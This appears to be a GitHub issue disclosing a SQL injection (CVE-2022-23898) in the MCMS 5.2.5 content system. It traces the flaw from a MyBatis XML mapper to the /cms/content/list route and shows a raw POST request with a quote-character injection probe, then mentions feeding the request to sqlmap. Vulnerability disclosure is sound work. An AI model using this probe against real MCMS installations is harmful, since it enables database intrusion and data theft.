Headline
CVE-2022-23898: MCMS5.2.5 SQLI · Issue #62 · ming-soft/MCMS
MCMS v5.2.5 was discovered to contain a SQL injection vulnerability via the categoryId parameter in the file IContentDao.xml.
A suspicious point was found in the IContentDao.xml file
Since the id of select maps to a method in Java, and this XML corresponds to Content, we looked directly in ComtentAction.java and found a call to
Next we try to inject, see the top class definition of ComtentAction.java of the file, we can know that the route is host:port/cms/content, and then Adding the method to be called, we can get the route as host:port/cms/content/list, and from the placeholder of IContentDao.xml, we can know that the suspicious injection point is categoryId, and then try to inject
POST /cms/content/list HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Phpstorm-f0bc0443=05da4cd3-973a-421b-afa6-a7c2e0ed2f79;
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
contentType=1'
—
As you can see, the injection was successful, and the next step is to save the post package and put it into sqlmap to run
